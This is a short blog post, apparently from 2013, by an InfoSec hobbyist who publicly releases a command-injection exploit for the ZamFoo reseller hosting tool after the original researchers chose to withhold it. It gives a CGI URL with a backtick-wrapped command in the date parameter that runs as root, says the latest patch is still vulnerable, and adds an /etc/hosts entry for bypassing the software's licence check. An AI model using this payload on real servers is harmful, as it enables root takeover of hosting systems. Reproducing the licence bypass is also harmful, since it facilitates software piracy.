localhost
Random ramblings from someone working in InfoSec

contact me@localhost.re
archive - rss
2013/06/15

Soo... I've been following a thread on Webhostingtalk where two security researchers are trying to get a vulnerability patched.

Well, in like 5 minutes, I found the little bugger. And since the original researchers have decided not to release it.. here is mine :)

All you need to do is run this url as a reseller and insert the command you wish to run and it will be executed as root.

/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`

Pretty slick. The new patch out today is still vulnerable aswell..

must see

BTW you can basically null this software and access all of the cgi files except the main menu by adding this into your /etc/hosts file

127.0.0.1 zamfoo.com www.zamfoo.com